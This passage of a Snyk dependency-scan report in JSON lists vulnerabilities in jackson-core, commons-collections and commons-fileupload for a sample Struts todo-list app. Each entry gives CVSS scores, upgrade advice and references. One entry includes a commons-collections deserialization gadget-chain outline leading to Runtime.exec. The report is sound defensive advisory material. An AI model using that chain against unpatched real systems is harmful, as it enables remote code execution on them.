process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "TERASOLUNA Framework Development Team" + ], + "semver": { + "vulnerable": [ + "[1.3,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h", + "title": "Apache-SVN" + }, + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092", + "title": "CVE Details" + }, + { + "url": "https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml%23L84", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349475", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:38.873057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n", + "epssDetails": { + "percentile": "0.92395", + "probability": "0.04275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3092" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": 